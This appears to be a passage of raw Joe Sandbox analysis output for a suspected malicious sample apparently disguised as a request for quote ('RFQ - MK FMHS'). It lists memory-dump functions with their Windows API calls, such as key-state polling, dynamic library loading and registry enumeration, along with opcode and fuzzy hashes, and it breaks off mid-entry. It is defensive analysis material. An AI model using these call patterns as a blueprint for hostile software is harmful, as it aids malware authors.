                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Menu$Delete$InfoItem_memset
                    • String ID: 0
                    • API String ID: 1173514356-4108050209
                    • Opcode ID: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
                    • Instruction ID: 3d9588f82736e1337a998ef05e300af70c90738085b798eb39ab5d3536243e63
                    • Opcode Fuzzy Hash: 1707bec59df465a4de149f9556020aa4359b569b82759f3658fa96a121555c16
                    • Instruction Fuzzy Hash: 4D41A0302043019FD724DF24C844B5ABBE9EFD5324F14565EFA65AB391D770E906CB92
                    APIs
                    • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9
                      • Part of subcall function 00E779AB: _memmove.LIBCMT ref: 00E779F9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharLower_memmove
                    • String ID: cdecl$none$stdcall$winapi
                    • API String ID: 3425801089-567219261
                    • Opcode ID: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
                    • Instruction ID: f844adc26d13edb117d6cd6b25ae84f7768fcf80bf876e8cc0c4d7d0433459d4
                    • Opcode Fuzzy Hash: 0442d7a15c68bc48f6dfd158354435d5903702cef207ec1620cd0b4b82be1fe0
                    • Instruction Fuzzy Hash: F531A471504619AFCF10EF55CC819EEB3F4FF05314B11962AE869B76D1DB71A905CB80
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7
                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EC93F6
                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EC9409
                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EC9439
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$_memmove$ClassName
                    • String ID: ComboBox$ListBox
                    • API String ID: 365058703-1403004172
                    • Opcode ID: 7d4672f1a4c6b411dd2e328eb8aad429dd81fe38eafe5accbf83b76f25aeab7c
                    • Instruction ID: e1232e528ab20294ac912f9efb6be6702055cb9af18dacfd20e8cdd51868173f
                    • Opcode Fuzzy Hash: 7d4672f1a4c6b411dd2e328eb8aad429dd81fe38eafe5accbf83b76f25aeab7c
                    • Instruction Fuzzy Hash: 25210671A00104AEDB18AB74DC8ADFFB7B8EF45350B10912DF925B71E1DB364A0BD610
                    APIs
                      • Part of subcall function 00E71D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E71D73
                      • Part of subcall function 00E71D35: GetStockObject.GDI32(00000011), ref: 00E71D87
                      • Part of subcall function 00E71D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E71D91
                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00EF66D0
                    • LoadLibraryW.KERNEL32(?), ref: 00EF66D7
                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00EF66EC
                    • DestroyWindow.USER32(?), ref: 00EF66F4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                    • String ID: SysAnimate32
                    • API String ID: 4146253029-1011021900
                    • Opcode ID: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
                    • Instruction ID: 2e2434f7fe9378bd962ddbb880cb08cafd21037ba5bc81826f5029dbd673cd9b
                    • Opcode Fuzzy Hash: fa54d57b6013bcdf15b31d24022b3a3f70ea1c12b4999cf4d46929fee64c2565
                    • Instruction Fuzzy Hash: 8D215B7120020ABFEF105F64EC80EBB77ADEF99368F116629FA11E6190DB71DC51A760
                    APIs
                    • GetStdHandle.KERNEL32(0000000C), ref: 00ED705E
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED7091
                    • GetStdHandle.KERNEL32(0000000C), ref: 00ED70A3
                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00ED70DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
                    • Instruction ID: 35f5873eefe12a8ce9462e3945def6877e938b22488134469b5545f995afaaef
                    • Opcode Fuzzy Hash: f50095a67ab2ef856260b56346d2be038577d7040f5b3a3843e3cfb3ea63f7cf
                    • Instruction Fuzzy Hash: 63218174604209ABDF209F29DC05AAA77E8EF44724F205A1AFDE0E73D0E7709852CB50
                    APIs
                    • GetStdHandle.KERNEL32(000000F6), ref: 00ED712B
                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ED715D
                    • GetStdHandle.KERNEL32(000000F6), ref: 00ED716E
                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00ED71A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateHandle$FilePipe
                    • String ID: nul
                    • API String ID: 4209266947-2873401336
                    • Opcode ID: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
                    • Instruction ID: a1bc860f726371eebc923e9590a0bf2e7f56816f5ef5f3abed715404dc3e6ef8
                    • Opcode Fuzzy Hash: 26fdcb69780b0d66066095f602653a150184c4abda9b778724bc3b2cee7f385b
                    • Instruction Fuzzy Hash: EE21A175605206ABDB209F699C04AAAB7E8EF55724F201B1AFCF0F73D0E7709842CB51
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDAEBF
                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00EDAF13
                    • __swprintf.LIBCMT ref: 00EDAF2C
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00EFF910), ref: 00EDAF6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$InformationVolume__swprintf
                    • String ID: %lu
                    • API String ID: 3164766367-685833217
                    • Opcode ID: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
                    • Instruction ID: a940ed22884414dbe638867ab3cc282b9d87032ba83ca842bf5a8700abc948e7
                    • Opcode Fuzzy Hash: fa9d41d08043ed3e902302bd35f918d1fb795d9a5683c641b631c3d91f4a16dd
                    • Instruction Fuzzy Hash: 62216030A00209AFCB10DB65C985DAE7BF8EF89704B0040A9F909BB352DB71EA45CB21
                    APIs
                      • Part of subcall function 00E77D2C: _memmove.LIBCMT ref: 00E77D66
                      • Part of subcall function 00ECA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ECA399
                      • Part of subcall function 00ECA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ECA3AC
                      • Part of subcall function 00ECA37C: GetCurrentThreadId.KERNEL32 ref: 00ECA3B3
                      • Part of subcall function 00ECA37C: AttachThreadInput.USER32(00000000), ref: 00ECA3BA
                    • GetFocus.USER32 ref: 00ECA554
                      • Part of subcall function 00ECA3C5: GetParent.USER32(?), ref: 00ECA3D3
                    • GetClassNameW.USER32(?,?,00000100), ref: 00ECA59D
                    • EnumChildWindows.USER32(?,00ECA615), ref: 00ECA5C5
                    • __swprintf.LIBCMT ref: 00ECA5DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                    • String ID: %s%d
                    • API String ID: 1941087503-1110647743
                    • Opcode ID: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
                    • Instruction ID: 2539261973b604c3c07a198cd5eb4d2d28b6854a08052351e9e8f2f095062ece
                    • Opcode Fuzzy Hash: 9835eb746e14c0b5dda6ad3e0257121eb3fdede667ae20a42624517c5c90ce05
                    • Instruction Fuzzy Hash: 2011A271600308ABDF107F64DD85FFE77B8AF89708F085079FA18BA192CA7159468B75
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00ED2048
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                    • API String ID: 3964851224-769500911
                    • Opcode ID: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
                    • Instruction ID: 6dd0eb3e0c391d54921a5284d4cc747cff82acdf8c8e39af85dd59e5c43aa51d
                    • Opcode Fuzzy Hash: 5ad3e84db72aca3724afad43101c8853a80c47373795825e64487dc25cba4ecc
                    • Instruction Fuzzy Hash: 03115B309001198FCF00EFA4D9514EEB7F4FF25304B54986AD855B7352EB32691BDB51
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEEF1B
                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEEF4B
                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00EEF07E
                    • CloseHandle.KERNEL32(?), ref: 00EEF0FF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                    • String ID:
                    • API String ID: 2364364464-0
                    • Opcode ID: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
                    • Instruction ID: b027f8f48297d5290bbbe286d2046331c4377c6e08bba0da3700ea6b5767d13a
                    • Opcode Fuzzy Hash: fd0ef77ab41558197d9d8e812702051e9d0c187f96c1750732f2ad0e959bd769
                    • Instruction Fuzzy Hash: 92814E716043019FD720DF29C886B6AB7E5EF88720F14982DF999EB292DB70AD40CB51
                    APIs
                      • Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82
                      • Part of subcall function 00EF10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF0038,?,?), ref: 00EF10BC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF0388
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF03C7
                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EF040E
                    • RegCloseKey.ADVAPI32(?,?), ref: 00EF043A
                    • RegCloseKey.ADVAPI32(00000000), ref: 00EF0447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                    • String ID:
                    • API String ID: 3440857362-0
                    • Opcode ID: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
                    • Instruction ID: 2e489be1ed560afb63f989b34fb2d33b24280af48785290845fbafc3ca5d242d
                    • Opcode Fuzzy Hash: 01166f9403db662667c5981eaea521350cd8fae8b3c4accdcb84c8233df7cd75
                    • Instruction Fuzzy Hash: 8E513A31208204AFD704EF64C881E7EB7E9FF84314F44992EF699A7292DB31E905CB52
                    APIs
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDC3B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EEDCBE
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EEDCDA
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00EEDD1B
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00EEDD35
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00ED7B20,?,?,00000000), ref: 00E75B8C
                      • Part of subcall function 00E75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00ED7B20,?,?,00000000,?,?), ref: 00E75BB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                    • String ID:
                    • API String ID: 327935632-0
                    • Opcode ID: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
                    • Instruction ID: 4467aa36dab96b5c9670e3df1d6c27908c97f22bc703f4075831882c03728512
                    • Opcode Fuzzy Hash: 31c582489ac004ffe01f80810d241de14ba649f5c3be54e127aa2e62211538c4
                    • Instruction Fuzzy Hash: CD512435A042099FCB01EFA9C8849ADF7F4EF48324B15D069E819AB362DB70AD45CF91
                    APIs
                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EDE88A
                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EDE8B3
                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EDE8F2
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EDE917
                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EDE91F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                    • String ID:
                    • API String ID: 1389676194-0
                    • Opcode ID: 938f5561ba6811d252f69a94c78cf10e0b43a62d487d5c0513867f9d6445507f
                    • Instruction ID: 0b723947f190294ab5952262815eb5ea3d16a2eefa4fbea8ec9b57d549e9f96b
                    • Opcode Fuzzy Hash: 938f5561ba6811d252f69a94c78cf10e0b43a62d487d5c0513867f9d6445507f
                    • Instruction Fuzzy Hash: 45512835A00205EFDF05EF64C985AAEBBF5EF48314B1490A9E909BB362DB31ED11DB50
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
                    • Instruction ID: 49c0d6bbcf9801b128074110ab43017e9f191c9809a43c162c3c2f4ed4046a0e
                    • Opcode Fuzzy Hash: 20977170fd56c3f0b837bb3b887c41ffa8b4c39a9afa652b6fce8f1ceda7eda3
                    • Instruction Fuzzy Hash: F541E3B590110CAFC710DB28CC44FBDBBA5EB09314F195175EA29BB2E1D770AD41DA51
                    APIs
                    • GetCursorPos.USER32(?), ref: 00E72357
                    • ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                    • GetAsyncKeyState.USER32(00000001), ref: 00E72399
                    • GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AsyncState$ClientCursorScreen
                    • String ID:
                    • API String ID: 4210589936-0
                    • Opcode ID: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
                    • Instruction ID: ba190f1c86b2fa13795951724431315d7e0e365961b8672004555c489c71b461
                    • Opcode Fuzzy Hash: f407f62b85a6bb5e9ff1469fbb17af99e70a7d79bacd41426f36a203f1ef9888
                    • Instruction Fuzzy Hash: D041813590411AFFDF159F68CC44AE9BBB4FF49324F20931AF928B62A0C7346954DBA1
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC695D
                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00EC69A9
                    • TranslateMessage.USER32(?), ref: 00EC69D2
                    • DispatchMessageW.USER32(?), ref: 00EC69DC
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EC69EB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                    • String ID:
                    • API String ID: 2108273632-0
                    • Opcode ID: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
                    • Instruction ID: dee1c91b7e5e54cb32c37cc3879af8a3252a0fa81c3856ac0bcdef0f773d4eb3
                    • Opcode Fuzzy Hash: e3b67bde0318ff516db4abe8682371237469e63787b32fc6312d55e7c40ec1e0
                    • Instruction Fuzzy Hash: 2A31C531504246AEDB20CF75CD44FB77BA9AF45318F10916DE421E21A1DB36D88BE7A0
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00EC8F12
                    • PostMessageW.USER32(?,00000201,00000001), ref: 00EC8FBC
                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EC8FC4
                    • PostMessageW.USER32(?,00000202,00000000), ref: 00EC8FD2
                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EC8FDA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessagePostSleep$RectWindow
                    • String ID:
                    • API String ID: 3382505437-0
                    • Opcode ID: 7286830d3b3a641c6807e974347c69c8fa803005a142dc1b959539ba6e3b794a
                    • Instruction ID: df7913d166dbd16b402bbb6fd2d27dac8da50c1ec251e63a522ecf91fe3394d7
